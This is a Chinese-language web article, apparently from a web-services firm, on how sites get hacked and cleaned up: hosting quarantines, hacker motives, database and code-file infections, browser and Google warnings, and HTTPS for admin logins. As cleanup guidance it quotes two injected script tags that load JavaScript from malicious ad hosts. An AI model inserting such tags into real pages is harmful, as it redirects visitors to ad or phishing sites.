內容目錄
解決網站被黑客入侵需要網頁寄存公司的把關
當網頁寄存公司發現 網站中毒 被黑客入侵,有可能傳播病毒時,網頁寄存公司第一時間會隔離你的網站。當訪客訪問你的網站時看到不會是正常網站,而是網頁寄存公司提供的告示板。這對你公司的形象當然不好。這時清理的做法較簡單,你需要清理病毒 (例如刪除或還原所有受感染的檔案,又或者還原網站未受感染的備份版本),再通知網頁寄存公司已經清理病毒,請寄存公司重新開放網站。
黑客 Hackers 入侵他人網站有不同的理由,例如:
- 有些黑客會入侵網域登記公司的伺服器,騎劫閣下的網域,將網域指自某些 e-commerce 網站,利用閣下原有的人流進行銷售或廣告獲利。
- 有些黑客入侵網站為植入群發電郵機制,利用閣下的伺服器大量發送推廣電郵,或造成超負荷而影響網站的正常操作,你不一定能察覺得到但網頁寄存公司會偵察到不尋常的電郵流量從而限制電郵流量而影響到你的正常郵件發送。
- 有些黑客入侵網站純粹為了展示實力或報復,入侵後改變網站內容。
- 更多黑客是為了錢,例如傳播盗取密碼的病毒,因此不希望站長發現。
數據庫感染
有些感染會將網站的所有連結騎劫到廣告網站 (如:ads.googleadservices.at, online-sale24.com),希望通過廣告網站買廣告購錢又或者進行網絡釣魚 Phishing。病毒通過修改每頁的內容,加入 Javascript 自動跳到廣告網站。由於是感染數據庫的內容,可以避過網頁伺服器上的防毒掃描。但這些動作基本是難以避過客戶端瀏覽器或防毒軟件的偵側,很快被感染的網站就會被客戶端瀏覽器或防毒軟件隔離,是損人不利己。
要清除些感染唯有將數據庫滙出為 SQL,利用編輯器將被種入的代碼 script 全部代替為空。清理完成後,重新將數據導入數據庫。
<script type=”text/javascript” src=”http://ads.googleadservices.at/counter.js”></script>
<script type=”text/javascript” src=”http://online-sale24.com/1.js”></script>
執行代碼文件感染
有一些感染是在可執行代碼文件中插入代碼。代碼可以是連到廣告網站或者純粹為記錄用戶行為。當感染已經散佈到大部份檔案時,你只有通過程行掃描該段感染代碼自動清除。
網站中毒 – 網頁瀏覽器的把關
但很多廉價的網頁寄存公司其實是沒有每天自動掃描偵測網站內可能出現的病毒,又或者他們技術上並不比黑客更好。下一個把關防止病毒傳播的是網頁瀏覽器。瀏覽器希望儘量確保訪客網上瀏覽過程安全。對於一些可能傳播病毒或不安全的網站,瀏覽器會通報閣下現在要訪閣的網站不安全。
如果你的網站不幸被黑客入侵而種下病毒,你應該儘快採取行動。長時間處於所感染狀態對網域權威性有極壞影響,對搜尋排名不利,從被感染網域發出的電郵亦較容易被評為垃圾郵件 Spams。但解決方法就比較複雜。理由是除需要清理病毒外,你要 (通過 Google Search Console) 告訴 Google 該網站是乾淨的,要求複審。
網站安全徽章
有些網絡安全公司提供每日掃描網站內容服務。如果無發現病毒,會更生徽章顯示給訪客知道網站是安全的。這對 eCommerce 網站的信用有正面幫助。
搜尋引擎由於會定期索引網站內容,所以亦可能會發現病毒。Google 搜尋引擎會通知訪客該網站可能受病毒感染。如果您使用 Google Search Console,Google 會通過 Search Console 通知您,網站受病毒感染。如果你是該網站的站主,為免影響搜尋結果排名,應該立即採取行動。
HTTPS 安全使用
管理網站很多時是要經過瀏覽器登入後台管理。如果登入時是使用不加密連線。用戶名稱和密碼就有可能暴露在黑客面前,特別是現在公共場所使用 Wifi 連線。所以最好是升級網站使用 HTTPS 加密連線,否則只有在安全環境下才考慮登入管理後台。
黑客一般是取易不取難,提高安全性,即使只是一點點可以帶來很多的好處。了解更多網站制作內容管理系統。